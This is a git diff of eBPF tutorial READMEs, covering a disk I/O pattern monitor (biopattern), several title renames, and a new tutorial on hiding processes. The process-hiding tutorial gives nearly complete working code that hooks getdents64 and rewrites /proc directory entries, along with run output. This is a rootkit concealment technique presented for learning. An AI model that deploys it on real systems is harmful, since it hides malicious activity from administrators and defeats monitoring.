+    __type(key, u32);
+    __type(value, struct counter);
+} counters SEC(".maps");
+
+SEC("tracepoint/block/block_rq_complete")
+int handle__block_rq_complete(void *args)
+{
+    struct counter *counterp, zero = {};
+    sector_t sector;
+    u32 nr_sector;
+    u32 dev;
+
+    if (has_block_rq_completion()) {
+        struct trace_event_raw_block_rq_completion___x *ctx = args;
+        sector = BPF_CORE_READ(ctx, sector);
+        nr_sector = BPF_CORE_READ(ctx, nr_sector);
+        dev = BPF_CORE_READ(ctx, dev);
+    } else {
+        struct trace_event_raw_block_rq_complete___x *ctx = args;
+        sector = BPF_CORE_READ(ctx, sector);
+        nr_sector = BPF_CORE_READ(ctx, nr_sector);
+        dev = BPF_CORE_READ(ctx, dev);
+    }
+
+    if (filter_dev && targ_dev != dev)
+        return 0;
+
+    counterp = bpf_map_lookup_or_try_init(&counters, &dev, &zero);
+    if (!counterp)
+        return 0;
+    if (counterp->last_sector) {
+        if (counterp->last_sector == sector)
+            __sync_fetch_and_add(&counterp->sequential, 1);
+        else
+            __sync_fetch_and_add(&counterp->random, 1);
+        __sync_fetch_and_add(&counterp->bytes, nr_sector * 512);
+    }
+    counterp->last_sector = sector + nr_sector;
+    return 0;
+}
+
+char LICENSE[] SEC("license") = "GPL";
+```
+
+1. Global variable definitions
+
+```c
+    const volatile bool filter_dev = false;
+    const volatile __u32 targ_dev = 0;
+```
+
+These two global variables are used for device filtering. `filter_dev` determines whether device filtering is enabled or not, and `targ_dev` is the identifier of the target device we want to track.
+
+2. BPF map definition
+
+```c
+    struct {
+        __uint(type, BPF_MAP_TYPE_HASH);
+        __uint(max_entries, 64);
+        __type(key, u32);
+        __type(value, struct counter);
+    } counters SEC(".maps");
+```
+
+This part of the code defines a BPF map of type hash table. The key of the map is the identifier of the device, and the value is a `counter` struct, which is used to store the I/O statistics of the device.
+
+3. The tracepoint function
+
+```c
+    SEC("tracepoint/block/block_rq_complete")
+    int handle__block_rq_complete(void *args)
+    {
+        struct counter *counterp, zero = {};
+        sector_t sector;
+        u32 nr_sector;
+        u32 dev;
+
+        if (has_block_rq_completion()) {
+            struct trace_event_raw_block_rq_completion___x *ctx = args;
+            sector = BPF_CORE_READ(ctx, sector);
+            nr_sector = BPF_CORE_READ(ctx, nr_sector);
+            dev = BPF_CORE_READ(ctx, dev);
+        } else {
+            struct trace_event_raw_block_rq_complete___x *ctx = args;
+            sector = BPF_CORE_READ(ctx, sector);
+            nr_sector = BPF_CORE_READ(ctx, nr_sector);
+            dev = BPF_CORE_READ(ctx, dev);
+        }
+
+        if (filter_dev && targ_dev != dev)
+            return 0;
+
+        counterp = bpf_map_lookup_or_try_init(&counters, &dev, &zero);
+        if (!counterp)
+            return 0;
+        if (counterp->last_sector) {
+            if (counterp->last_sector == sector)
+                __sync_fetch_and_add(&counterp->sequential, 1);
+            else
+                __sync_fetch_and_add(&counterp->random, 1);
+            __sync_fetch_and_add(&counterp->bytes, nr_sector * 512);
+        }
+        counterp->last_sector = sector + nr_sector;
+        return 0;
+    }
+```
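+
+If you want to see exactly which fields this tracepoint exposes on your kernel, you can dump its format description from tracefs (the path below assumes debugfs/tracefs is mounted in the usual location):
+
+```bash
+sudo cat /sys/kernel/debug/tracing/events/block/block_rq_complete/format
+```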
+
+In Linux, a tracepoint called `block_rq_complete` is triggered every time an I/O request for a block device completes. This provides an opportunity to capture these events with eBPF and further analyse the I/O patterns.
+
+Main logic analysis:
+
+- **Extracting I/O request information**: get information about the I/O request from the incoming arguments. There are two possible context structures depending on the return value of `has_block_rq_completion`, because different versions of the Linux kernel may have different tracepoint definitions. In either case, we extract the sector number (`sector`), the number of sectors (`nr_sector`) and the device identifier (`dev`) from the context.
+
+- **Device filtering**: if device filtering is enabled (`filter_dev` is `true`) and the current device is not the target device (`targ_dev`), we return immediately. This allows the user to track only specific devices instead of all devices.
+
+- **Statistics update**:
+
+  - **Look up or initialise statistics**: use the `bpf_map_lookup_or_try_init` function to look up or initialise the statistics related to the current device. If there are no statistics for the current device in the map, it is initialised using the `zero` structure.
+  - **Determine the I/O mode**: based on the sector numbers of the current and previous I/O requests, we can determine whether the current request is random or sequential. If the current request starts exactly where the previous one ended (the position stored in `last_sector`), it is sequential; otherwise, it is random. We then use the `__sync_fetch_and_add` function to update the corresponding statistics. This is an atomic operation that ensures data consistency in a concurrent environment.
+  - **Update the amount of data**: we also update the total amount of data for the device, which is done by multiplying the number of sectors (`nr_sector`) by 512 (the number of bytes per sector).
+  - **Update the sector number of the last I/O request**: for the next comparison, we update the value of `last_sector`.
+
+In some versions of the Linux kernel, the naming and structure of the tracepoint changed due to the introduction of a new tracepoint, `block_rq_error`: the structure name of the former `block_rq_complete` tracepoint was changed from `trace_event_raw_block_rq_complete` to `trace_event_raw_block_rq_completion`, a change which may cause compatibility issues for eBPF programs across different kernel versions.
+
+To address this issue, the `biopattern` utility introduces a mechanism to dynamically detect which tracepoint structure the current kernel uses, namely the `has_block_rq_completion` function.
+
+1. **Define two tracepoint structures**:
+
+```c
+    struct trace_event_raw_block_rq_complete___x {
+        dev_t dev;
+        sector_t sector;
+        unsigned int nr_sector;
+    } __attribute__((preserve_access_index));
+
+    struct trace_event_raw_block_rq_completion___x {
+        dev_t dev;
+        sector_t sector;
+        unsigned int nr_sector;
+    } __attribute__((preserve_access_index));
+```
+
+Two tracepoint structures are defined here, corresponding to different versions of the kernel. Each structure contains a device identifier (`dev`), sector number (`sector`), and number of sectors (`nr_sector`).
+
+2. 
**Dynamic detection of tracepoint structures**:
+
+```c
+    static __always_inline bool has_block_rq_completion()
+    {
+        if (bpf_core_type_exists(struct trace_event_raw_block_rq_completion___x))
+            return true;
+        return false;
+    }
+```
+
+The `has_block_rq_completion` function uses the `bpf_core_type_exists` function to detect the presence of the structure `trace_event_raw_block_rq_completion___x` in the current kernel. If it exists, the function returns `true`, indicating that the current kernel is using the new tracepoint structure; otherwise, it returns `false`, indicating that it is using the old structure. The two different definitions are handled separately in the corresponding eBPF code, which is a common solution for adapting to changes between kernel versions.
+
+### User-Space Code
+
+The `biopattern` tool's user-space code is responsible for reading statistics from the BPF map and presenting them to the user. In this way, system administrators can monitor the I/O patterns of each device in real time to better understand and optimise the I/O performance of the system.
+
+1. Main loop
+
+```c
+    /* main: poll */
+    while (1) {
+        sleep(env.interval);
+
+        err = print_map(obj->maps.counters, partitions);
+        if (err)
+            break;
+
+        if (exiting || --env.times == 0)
+            break;
+    }
+```
+
+This is the main loop of the `biopattern` utility, and its workflow is as follows:
+
+- **Wait**: use the `sleep` function to wait for the specified interval (`env.interval`).
+- **Print the map**: call the `print_map` function to print the statistics in the BPF map.
+- **Exit condition**: if an exit signal is received (`exiting` is `true`) or the specified number of runs is reached (`env.times` reaches 0), the loop exits.
+
+2. Print map function
+
+```c
+    static int print_map(struct bpf_map *counters, struct partitions *partitions)
+    {
+        __u32 total, lookup_key = -1, next_key;
+        int err, fd = bpf_map__fd(counters);
+        const struct partition *partition;
+        struct counter counter;
+        struct tm *tm;
+        char ts[32];
+        time_t t;
+
+        while (!bpf_map_get_next_key(fd, &lookup_key, &next_key)) {
+            err = bpf_map_lookup_elem(fd, &next_key, &counter);
+            if (err < 0) {
+                fprintf(stderr, "failed to lookup counters: %d\n", err);
+                return -1;
+            }
+            lookup_key = next_key;
+            total = counter.sequential + counter.random;
+            if (!total)
+                continue;
+            if (env.timestamp) {
+                time(&t);
+                tm = localtime(&t);
+                strftime(ts, sizeof(ts), "%H:%M:%S", tm);
+                printf("%-9s ", ts);
+            }
+            partition = partitions__get_by_dev(partitions, next_key);
+            printf("%-7s %5ld %5ld %8d %10lld\n",
+                   partition ? partition->name : "Unknown",
+                   counter.random * 100L / total,
+                   counter.sequential * 100L / total, total,
+                   counter.bytes / 1024);
+        }
+
+        lookup_key = -1;
+        while (!bpf_map_get_next_key(fd, &lookup_key, &next_key)) {
+            err = bpf_map_delete_elem(fd, &next_key);
+            if (err < 0) {
+                fprintf(stderr, "failed to cleanup counters: %d\n", err);
+                return -1;
+            }
+            lookup_key = next_key;
+        }
+
+        return 0;
+    }
+```
+
+The `print_map` function is responsible for reading statistics from the BPF map and printing them to the console. The main logic is as follows:
+
+- **Traverse the BPF map**: use the `bpf_map_get_next_key` and `bpf_map_lookup_elem` functions to traverse the BPF map and get the statistics for each device.
+- **Calculate totals**: calculate the total number of random and sequential I/Os for each device.
+- **Print statistics**: if the timestamp is enabled (`env.timestamp` is `true`), the current time is printed first. Next, the device name, the percentage of random I/O, the percentage of sequential I/O, the total I/O count, and the total data volume in KB are printed.
+- **Clean up the BPF map**: for the next count, use the `bpf_map_get_next_key` and `bpf_map_delete_elem` functions to clean up all entries in the BPF map.
+
+## Summary
+
+In this tutorial, we have taken an in-depth look at how to use the eBPF tool biopattern to monitor and count random and sequential disk I/O in real time. We started by understanding the importance of random and sequential disk I/O and their impact on system performance. We then described in detail how biopattern works, including how to define and use BPF maps, how to deal with tracepoint variations in different versions of the Linux kernel, and how to capture and analyse disk I/O events in an eBPF program.
+
+You can visit our tutorial code repository [at https://github.com/eunomia-bpf/bpf-developer-tutorial](https://github.com/eunomia-bpf/bpf-developer-tutorial) or our website [at https://eunomia.dev/zh/tutorials/](https://eunomia.dev/zh/tutorials/) for more examples and a complete tutorial.
+
+- Source repo:
+- bcc tool:
diff --git a/src/19-lsm-connect/README_en.md b/src/19-lsm-connect/README_en.md
index 0c6b15b..adfaefb 100644
--- a/src/19-lsm-connect/README_en.md
+++ b/src/19-lsm-connect/README_en.md
@@ -1,4 +1,4 @@
-# eBPF Getting Started Tutorial: Security Detection and Defense using LSM
+# eBPF Tutorial by Example: Security Detection and Defense using LSM
 
 eBPF (Extended Berkeley Packet Filter) is a powerful network and performance analysis tool widely used in the Linux kernel. eBPF allows developers to dynamically load, update, and run user-defined code without restarting the kernel or modifying the kernel source code. This feature enables eBPF to provide high flexibility and performance, making it widely applicable in network and system performance analysis. The same applies to eBPF applications in security, and this article will introduce how to use the eBPF LSM (Linux Security Modules) mechanism to implement a simple security check program.
diff --git a/src/2-kprobe-unlink/README_en.md b/src/2-kprobe-unlink/README_en.md
index 45165e6..139aa5c 100644
--- a/src/2-kprobe-unlink/README_en.md
+++ b/src/2-kprobe-unlink/README_en.md
@@ -1,8 +1,8 @@
-# eBPF Beginner's Development Practice Tutorial 2: Using kprobe to Monitor the unlink System Call in eBPF
+# eBPF Tutorial by Example 2: Monitoring unlink System Calls with kprobe
 
 eBPF (Extended Berkeley Packet Filter) is a powerful network and performance analysis tool on the Linux kernel. It allows developers to dynamically load, update, and run user-defined code at runtime.
 
-This article is the second part of the eBPF beginner's development practice tutorial, focusing on using kprobe to capture the unlink system call in eBPF. The article will first explain the basic concepts and technical background of kprobes, and then introduce how to use kprobe to capture the unlink system call in eBPF.
+This article is the second part of the eBPF Tutorial by Example, focusing on using kprobe to capture the unlink system call in eBPF. The article will first explain the basic concepts and technical background of kprobes, and then introduce how to use kprobe to capture the unlink system call in eBPF.
 
 ## Background of kprobes Technology
diff --git a/src/20-tc/README_en.md b/src/20-tc/README_en.md
index 34d7ff0..c0d5c2c 100644
--- a/src/20-tc/README_en.md
+++ b/src/20-tc/README_en.md
@@ -1,4 +1,4 @@
-# eBPF Introductory Practice Tutorial 20: Use eBPF for tc Traffic Control
+# eBPF Tutorial by Example 20: Use eBPF for tc Traffic Control
 
 ## Background
diff --git a/src/21-xdp/README_en.md b/src/21-xdp/README_en.md
index 3918226..5c1b635 100644
--- a/src/21-xdp/README_en.md
+++ b/src/21-xdp/README_en.md
@@ -1,4 +1,4 @@
-# eBPF Beginner Tutorial 21: Programmable Packet Processing with XDP
+# eBPF Tutorial by Example 21: Programmable Packet Processing with XDP
 
 ## Background
diff --git a/src/24-hide/README_en.md b/src/24-hide/README_en.md
index f9ae6da..9d9bb8c 100644
--- a/src/24-hide/README_en.md
+++ b/src/24-hide/README_en.md
@@ -1 +1,427 @@
-# TODO: translate into English
\ No newline at end of file
+# eBPF Tutorial by Example 24: Hiding Process or File Information with eBPF
+
+eBPF (Extended Berkeley Packet Filter) is a powerful feature in the Linux kernel that allows you to run, load, and update user-defined code without having to change the kernel source code or reboot the kernel. This capability allows eBPF to be used in a wide range of applications such as network and system performance analysis, packet filtering, and security policies.
+
+In this tutorial, we will show how eBPF can be used to hide process or file information, a common technique in the field of network security and defence.
+
+## Background Knowledge and Implementation Mechanism
+
+"Process hiding" enables a specific process to become invisible to the operating system's regular detection mechanisms. This technique can be used in both hacking and system defence scenarios. Specifically, each process on a Linux system has a subfolder named after its process ID in the `/proc/` directory, which contains various information about the process. The `ps` command displays process information by looking in these folders. Therefore, if we can hide the `/proc/` folder of a process, we can make that process invisible to `ps` and other detection methods.
+
+The key to achieving process hiding is to manipulate the `/proc/` directory. In Linux, the `getdents64` system call reads the entries of a directory. We can hide files by hooking into this system call and modifying the results it returns. To do this, we need eBPF's `bpf_probe_write_user` function, which can modify user-space memory, and therefore can be used to patch the results returned by `getdents64`.
+
+In the following, we will describe in detail how to write both the kernel-mode and user-mode parts of an eBPF program to implement process hiding.
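+
+Before diving into the code, you can see for yourself the per-PID folders that `ps` relies on. A quick check from the shell:
+
+```bash
+# Each running process appears as a numbered folder under /proc;
+# hiding one of these folders hides the process from tools like ps.
+ls -d /proc/[0-9]* | head -5
+```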
+
+### Kernel eBPF Program Implementation
+
+Next, we will describe in detail how to write the kernel-mode eBPF program that implements process hiding. The first part of the program is its preamble and map definitions:
+
+```c
+// SPDX-License-Identifier: BSD-3-Clause
+#include "vmlinux.h"
+#include <bpf/bpf_helpers.h>
+#include <bpf/bpf_tracing.h>
+#include <bpf/bpf_core_read.h>
+#include "common.h"
+
+char LICENSE[] SEC("license") = "Dual BSD/GPL";
+
+// Ringbuffer Map to pass messages from kernel to user
+struct {
+    __uint(type, BPF_MAP_TYPE_RINGBUF);
+    __uint(max_entries, 256 * 1024);
+} rb SEC(".maps");
+
+// Map to hold the dents buffer addresses
+struct {
+    __uint(type, BPF_MAP_TYPE_HASH);
+    __uint(max_entries, 8192);
+    __type(key, size_t);
+    __type(value, long unsigned int);
+} map_buffs SEC(".maps");
+
+// Map used to enable searching through the
+// data in a loop
+struct {
+    __uint(type, BPF_MAP_TYPE_HASH);
+    __uint(max_entries, 8192);
+    __type(key, size_t);
+    __type(value, int);
+} map_bytes_read SEC(".maps");
+
+// Map with address of the dirent to patch
+struct {
+    __uint(type, BPF_MAP_TYPE_HASH);
+    __uint(max_entries, 8192);
+    __type(key, size_t);
+    __type(value, long unsigned int);
+} map_to_patch SEC(".maps");
+
+// Map to hold program tail calls
+struct {
+    __uint(type, BPF_MAP_TYPE_PROG_ARRAY);
+    __uint(max_entries, 5);
+    __type(key, __u32);
+    __type(value, __u32);
+} map_prog_array SEC(".maps");
+```
+
+The first thing we need to do is to understand the basic structure of the eBPF program and the important components that are used. The first few lines reference several important header files, such as "vmlinux.h", "bpf_helpers.h", "bpf_tracing.h" and "bpf_core_read.h". These files provide the infrastructure needed for eBPF programming and some important functions or macros.
+
+- "vmlinux.h" is a header file containing the complete kernel data structures extracted from the vmlinux kernel binary. Using this header file, eBPF programs can access kernel data structures.
+- The "bpf_helpers.h" header file defines a series of macros that encapsulate the BPF helper functions used by eBPF programs. These BPF helper functions are the main way that eBPF programs interact with the kernel.
+- The "bpf_tracing.h" header file, used for tracing events, contains a number of macros and functions designed to simplify the use of tracepoints in eBPF programs.
+- The "bpf_core_read.h" header file provides a set of macros and functions for reading data from the kernel.
+
+The program defines a series of map structures, which are the main data structures in an eBPF program. They are used to share data between the kernel and user space, or to store and transfer data within the eBPF program.
+
+Among them, "rb" is a map of type Ringbuffer, which is used to pass messages from the kernel to user space. Ringbuffer is a data structure that can efficiently pass large amounts of data between the kernel and user space.
+
+"map_buffs" is a map of type Hash, which is used to store the buffer addresses of directory entries.
+
+"map_bytes_read" is another Hash-type map that is used to enable searching through the data in a loop.
+
+"map_to_patch" is another Hash-type map that stores the address of the directory entry (dirent) that needs to be modified.
+
+"map_prog_array" is a map of type Prog Array, which is used to store the tail calls of the program.
+
+The "target_ppid", "pid_to_hide_len", and "pid_to_hide" variables are a few important global variables that store the PID of the target parent process, the length of the PID string that needs to be hidden, and the PID itself, respectively.
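+
+While the program is running, you can inspect these maps from user space. This is only a sketch and assumes the bpftool utility is installed:
+
+```bash
+# List all loaded BPF maps, then dump one of this program's maps by name
+sudo bpftool map list
+sudo bpftool map dump name map_buffs
+```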
+
+In the next part of the code, the program defines a structure called "linux_dirent64", which represents a Linux directory entry. The program then defines two functions, "handle_getdents_enter" and "handle_getdents_exit", which are called at the entry and exit of the getdents64 system call, respectively, and are used to implement the manipulation of directory entries.
+
+```c
+// Optional Target Parent PID
+const volatile int target_ppid = 0;
+
+// These store the string representation
+// of the PID to hide. This becomes the name
+// of the folder in /proc/
+const volatile int pid_to_hide_len = 0;
+const volatile char pid_to_hide[max_pid_len];
+
+// struct linux_dirent64 {
+//     u64            d_ino;    /* 64-bit inode number */
+//     u64            d_off;    /* 64-bit offset to next structure */
+//     unsigned short d_reclen; /* Size of this dirent */
+//     unsigned char  d_type;   /* File type */
+//     char           d_name[]; /* Filename (null-terminated) */ };
+// int getdents64(unsigned int fd, struct linux_dirent64 *dirp, unsigned int count);
+SEC("tp/syscalls/sys_enter_getdents64")
+int handle_getdents_enter(struct trace_event_raw_sys_enter *ctx)
+{
+    size_t pid_tgid = bpf_get_current_pid_tgid();
+    // Check if we're a process thread of interest
+    // if target_ppid is 0 then we target all pids
+    if (target_ppid != 0) {
+        struct task_struct *task = (struct task_struct *)bpf_get_current_task();
+        int ppid = BPF_CORE_READ(task, real_parent, tgid);
+        if (ppid != target_ppid) {
+            return 0;
+        }
+    }
+    int pid = pid_tgid >> 32;
+    unsigned int fd = ctx->args[0];
+    unsigned int buff_count = ctx->args[2];
+
+    // Store params in map for exit function
+    struct linux_dirent64 *dirp = (struct linux_dirent64 *)ctx->args[1];
+    bpf_map_update_elem(&map_buffs, &pid_tgid, &dirp, BPF_ANY);
+
+    return 0;
+}
+```
+
+In this section of the code, we can see part of the implementation of the eBPF program that is responsible for the processing at the entry point of the `getdents64` system call.
+
+We start by declaring a few global variables. `target_ppid` represents the PID of the target parent process we want to focus on; if this value is 0, we focus on all processes. `pid_to_hide_len` and `pid_to_hide` are used to store the length of the PID of the process we want to hide and the PID itself, respectively. This PID becomes the name of a folder in the `/proc/` directory, so the hidden process will not be visible there.
+
+Next, we declare a structure called `linux_dirent64` (shown above in a comment). This structure represents a Linux directory entry and contains metadata such as the inode number, the offset of the next directory entry, the length of the current directory entry, the file type, and the filename.
+
+Then there is the prototype of the `getdents64` function. This function is a Linux system call that reads the contents of a directory. Our goal is to modify the directory entries during the execution of this function to achieve process hiding.
+
+The subsequent section is the concrete implementation of the eBPF program. We define a function called `handle_getdents_enter` at the entry point of the `getdents64` system call. This function first gets the PID and thread group ID of the current process, and then checks whether it is a process we are interested in. If we set `target_ppid`, then we only focus on processes whose parent has a PID of `target_ppid`. If `target_ppid` is 0, we focus on all processes.
+
+After confirming that the current process is one we are interested in, we save the arguments to the `getdents64` system call into a map to be used when the system call returns. 
In particular, we focus on the second argument to the `getdents64` system call, which is a pointer to the `linux_dirent64` structure representing the contents of the directory to be read by the system call. We save this pointer, along with the current PID and thread group ID, as a key-value pair in the `map_buffs` map. + +This completes the processing at the entry point of the `getdents64` system call. When the system call returns, we will modify the directory entry in the `handle_getdents_exit` function to hide the process. + +In the next snippet, we will implement the handling at the return of the `getdents64` system call. Our main goal is to find the process we want to hide and modify the directory entry to hide it. + +We start by defining a function called `handle_getdents_exit` that will be called when the `getdents64` system call returns. + +```c + +SEC("tp/syscalls/sys_exit_getdents64") +int handle_getdents_exit(struct trace_event_raw_sys_exit *ctx) +{ + size_t pid_tgid = bpf_get_current_pid_tgid(); + int total_bytes_read = ctx->ret; + // if bytes_read is 0, everything's been read + if (total_bytes_read <= 0) { + return 0; + } + + // Check we stored the address of the buffer from the syscall entry + long unsigned int* pbuff_addr = bpf_map_lookup_elem(&map_buffs, &pid_tgid); + if (pbuff_addr == 0) { + return 0; + } + + // All of this is quite complex, but basically boils down to + // Calling 'handle_getdents_exit' in a loop to iterate over the file listing + // in chunks of 200, and seeing if a folder with the name of our pid is in there. + // If we find it, use 'bpf_tail_call' to jump to handle_getdents_patch to do the actual + // patching + long unsigned int buff_addr = *pbuff_addr; + struct linux_dirent64 *dirp = 0; + int pid = pid_tgid >> 32; + short unsigned int d_reclen = 0; + char filename[max_pid_len]; + + unsigned int bpos = 0; + unsigned int *pBPOS = bpf_map_lookup_elem(&map_bytes_read, &pid_tgid); + if (pBPOS != 0) { + bpos = *pBPOS; + } + + for (int i = 0; i < 200; i ++) { + if (bpos >= total_bytes_read) { + break; + } + dirp = (struct linux_dirent64 *)(buff_addr+bpos); + bpf_probe_read_user(&d_reclen, sizeof(d_reclen), &dirp->d_reclen); + bpf_probe_read_user_str(&filename, pid_to_hide_len, dirp->d_name); + + int j = 0; + for (j = 0; j < pid_to_hide_len; j++) { + if (filename[j] != pid_to_hide[j]) { + break; + } + } + if (j == pid_to_hide_len) { + // *********** + // We've found the folder!!! + // Jump to handle_getdents_patch so we can remove it! + // *********** + bpf_map_delete_elem(&map_bytes_read, &pid_tgid); + bpf_map_delete_elem(&map_buffs, &pid_tgid); + bpf_tail_call(ctx, &map_prog_array, PROG_02); + } + bpf_map_update_elem(&map_to_patch, &pid_tgid, &dirp, BPF_ANY); + bpos += d_reclen; + } + + // If we didn't find it, but there's still more to read, + // jump back the start of this function and keep looking + if (bpos < total_bytes_read) { + bpf_map_update_elem(&map_bytes_read, &pid_tgid, &bpos, BPF_ANY); + bpf_tail_call(ctx, &map_prog_array, PROG_01); + } + bpf_map_delete_elem(&map_bytes_read, &pid_tgid); + bpf_map_delete_elem(&map_buffs, &pid_tgid); + + return 0; +} + +``` + +In this function, we first get the PID and thread group ID of the current process, and then check to see if the system call has read the contents of the directory. If it didn't read the contents, we just return. + +Then we get the address of the directory contents saved at the entry point of the `getdents64` system call from the `map_buffs` map. 
If we haven't saved this address, then there's no need to do any further processing. + +The next part is a bit more complicated, we use a loop to iteratively read the contents of the directory and check to see if we have the PID of the process we want to hide, and if we do, we use the `bpf_tail_call` function to jump to the `handle_getdents_patch` function to do the actual hiding. + +```c +SEC("tp/syscalls/sys_exit_getdents64") +int handle_getdents_patch(struct trace_event_raw_sys_exit *ctx) +{ + // Only patch if we've already checked and found our pid's folder to hide + size_t pid_tgid = bpf_get_current_pid_tgid(); + long unsigned int* pbuff_addr = bpf_map_lookup_elem(&map_to_patch, &pid_tgid); + if (pbuff_addr == 0) { + return 0; + } + + // Unlink target, by reading in previous linux_dirent64 struct, + // and setting it's d_reclen to cover itself and our target. + // This will make the program skip over our folder. + long unsigned int buff_addr = *pbuff_addr; + struct linux_dirent64 *dirp_previous = (struct linux_dirent64 *)buff_addr; + short unsigned int d_reclen_previous = 0; + bpf_probe_read_user(&d_reclen_previous, sizeof(d_reclen_previous), &dirp_previous->d_reclen); + + struct linux_dirent64 *dirp = (struct linux_dirent64 *)(buff_addr+d_reclen_previous); + short unsigned int d_reclen = 0; + bpf_probe_read_user(&d_reclen, sizeof(d_reclen), &dirp->d_reclen); + + // Debug print + char filename[max_pid_len]; + bpf_probe_read_user_str(&filename, pid_to_hide_len, dirp_previous->d_name); + filename[pid_to_hide_len-1] = 0x00; + bpf_printk("[PID_HIDE] filename previous %s\n", filename); + bpf_probe_read_user_str(&filename, pid_to_hide_len, dirp->d_name); + filename[pid_to_hide_len-1] = 0x00; + bpf_printk("[PID_HIDE] filename next one %s\n", filename); + + // Attempt to overwrite + short unsigned int d_reclen_new = d_reclen_previous + d_reclen; + long ret = bpf_probe_write_user(&dirp_previous->d_reclen, &d_reclen_new, sizeof(d_reclen_new)); + + // Send an event + struct event *e; + e = bpf_ringbuf_reserve(&rb, sizeof(*e), 0); + if (e) { + e->success = (ret == 0); + e->pid = (pid_tgid >> 32); + bpf_get_current_comm(&e->comm, sizeof(e->comm)); + bpf_ringbuf_submit(e, 0); + } + + bpf_map_delete_elem(&map_to_patch, &pid_tgid); + return 0; +} + +``` + +In the `handle_getdents_patch` function, we first check to see if we have found the PID of the process we want to hide, and then we read the contents of the directory entry and modify the `d_reclen` field so that it overwrites the next directory entry, thus hiding our target process. + +In this process, we use the functions `bpf_probe_read_user`, `bpf_probe_read_user_str`, and `bpf_probe_write_user` to read and write user-space data. This is because in kernel space, we can't access user space data directly and must use these special functions. + +After we finish the hiding operation, we send an event to a ring buffer called `rb` indicating that we have successfully hidden a process. We reserve space in the buffer with the `bpf_ringbuf_reserve` function, then fill that space with the event's data, and finally commit the event to the buffer with the `bpf_ringbuf_submit` function. + +Finally, we clean up the data previously saved in the map and return. + +This code is a good example of process hiding in an eBPF environment. Through this example, we can see the rich features provided by eBPF, such as system call tracing, map storage, user-space data access, tail calls, and so on. 
The eBPF code above is a good example of process hiding. Through it we can see the rich set of features eBPF provides, such as system call tracing, map storage, user-space data access, and tail calls. These features allow us to implement complex logic in kernel space without modifying the kernel source code.
+
+## User-Space eBPF Program
+
+The user-space program performs the following operations:
+
+1. Open the eBPF program.
+2. Set the PID of the process we want to hide.
+3. Verify and load the eBPF program.
+4. Wait for and process events sent by the eBPF program.
+
+First, we open the eBPF skeleton by calling the `pidhide_bpf__open` function. If this step fails, we simply return.
+
+```c
+    skel = pidhide_bpf__open();
+    if (!skel)
+    {
+        fprintf(stderr, "Failed to open BPF program: %s\n", strerror(errno));
+        return 1;
+    }
+```
+
+Next, we set the PID of the process we want to hide by writing it into the `rodata` section of the eBPF program. By default, we hide the current process.
+
+```c
+    char pid_to_hide[10];
+    if (env.pid_to_hide == 0)
+    {
+        env.pid_to_hide = getpid();
+    }
+    sprintf(pid_to_hide, "%d", env.pid_to_hide);
+    strncpy(skel->rodata->pid_to_hide, pid_to_hide, sizeof(skel->rodata->pid_to_hide));
+    skel->rodata->pid_to_hide_len = strlen(pid_to_hide) + 1;
+    skel->rodata->target_ppid = env.target_ppid;
+```
+
+We then verify and load the eBPF program by calling the `pidhide_bpf__load` function. If this step fails, we perform a cleanup operation.
+
+```c
+    err = pidhide_bpf__load(skel);
+    if (err)
+    {
+        fprintf(stderr, "Failed to load and verify BPF skeleton\n");
+        goto cleanup;
+    }
+```
+
+Finally, we wait for and process events sent by the eBPF program by calling the `ring_buffer__poll` function, which periodically checks the ring buffer for new events; whenever one arrives, the `handle_event` callback is invoked.
+
+```c
+printf("Successfully started!\n");
+printf("Hiding PID %d\n", env.pid_to_hide);
+while (!exiting)
+{
+    err = ring_buffer__poll(rb, 100 /* timeout, ms */);
+    /* Ctrl-C will cause -EINTR */
+    if (err == -EINTR)
+    {
+        err = 0;
+        break;
+    }
+    if (err < 0)
+    {
+        printf("Error polling perf buffer: %d\n", err);
+        break;
+    }
+}
+```
+
+In the `handle_event` function, we print an appropriate message based on the content of the event. Its arguments are a context pointer, the event data, and the size of that data. We first cast the event data to an `event` structure, then use the `success` field to determine whether the process was hidden, and print the corresponding message.
+
+```c
+static int handle_event(void *ctx, void *data, size_t data_sz)
+{
+    const struct event *e = data;
+    if (e->success)
+        printf("Hid PID from program %d (%s)\n", e->pid, e->comm);
+    else
+        printf("Failed to hide PID from program %d (%s)\n", e->pid, e->comm);
+    return 0;
+}
+```
+
+This code shows how the user-space side of the tool works: we open the eBPF skeleton, set the PID of the process to hide, verify and load the program, and finally wait for and handle the events it sends. It relies on eBPF features such as ring buffers and event handling, which make it easy for user space to interact with the kernel-side eBPF program.
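+One step the excerpts above do not show is wiring up the tail-call program array. For `bpf_tail_call` to work, the file descriptors of `handle_getdents_exit` and `handle_getdents_patch` have to be stored in `map_prog_array` at the `PROG_01` and `PROG_02` indexes. A minimal sketch of the usual libbpf pattern, assuming the program and map names from the kernel code above (the exact code in the repository may differ), looks like this:
+
+```c
+    // Sketch: register the tail-call targets after pidhide_bpf__load() succeeds.
+    int index = PROG_01;
+    int prog_fd = bpf_program__fd(skel->progs.handle_getdents_exit);
+    if (bpf_map_update_elem(bpf_map__fd(skel->maps.map_prog_array),
+                            &index, &prog_fd, BPF_ANY) != 0)
+    {
+        fprintf(stderr, "Failed to add program to prog array\n");
+        goto cleanup;
+    }
+    index = PROG_02;
+    prog_fd = bpf_program__fd(skel->progs.handle_getdents_patch);
+    if (bpf_map_update_elem(bpf_map__fd(skel->maps.map_prog_array),
+                            &index, &prog_fd, BPF_ANY) != 0)
+    {
+        fprintf(stderr, "Failed to add program to prog array\n");
+        goto cleanup;
+    }
+```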
+
+Full source code: [https://github.com/eunomia-bpf/bpf-developer-tutorial/tree/main/src/24-hide](https://github.com/eunomia-bpf/bpf-developer-tutorial/tree/main/src/24-hide)
+
+> The techniques shown in this article are a proof of concept intended for learning purposes only. They must not be used in scenarios that violate legal or regulatory requirements.
+
+## Compile and Run
+
+Compile the program with make:
+
+```bash
+make
+```
+
+Run the tool, specifying the PID of the process to hide:
+
+```sh
+sudo ./pidhide --pid-to-hide 1534
+```
+
+Without pidhide running, the target process is visible as usual:
+
+```console
+$ ps -aux | grep 1534
+yunwei 1534 0.0 0.0 244540 6848 ? Ssl 6月02 0:00 /usr/libexec/gvfs-mtp-volume-monitor
+yunwei 32065 0.0 0.0 17712 2580 pts/1 S+ 05:43 0:00 grep --color=auto 1534
+```
+
+Once running, pidhide reports every process whose directory listing it patches:
+
+```console
+$ sudo ./pidhide --pid-to-hide 1534
+Hiding PID 1534
+Hid PID from program 31529 (ps)
+Hid PID from program 31551 (ps)
+Hid PID from program 31560 (ps)
+Hid PID from program 31582 (ps)
+Hid PID from program 31582 (ps)
+Hid PID from program 31585 (bash)
+Hid PID from program 31585 (bash)
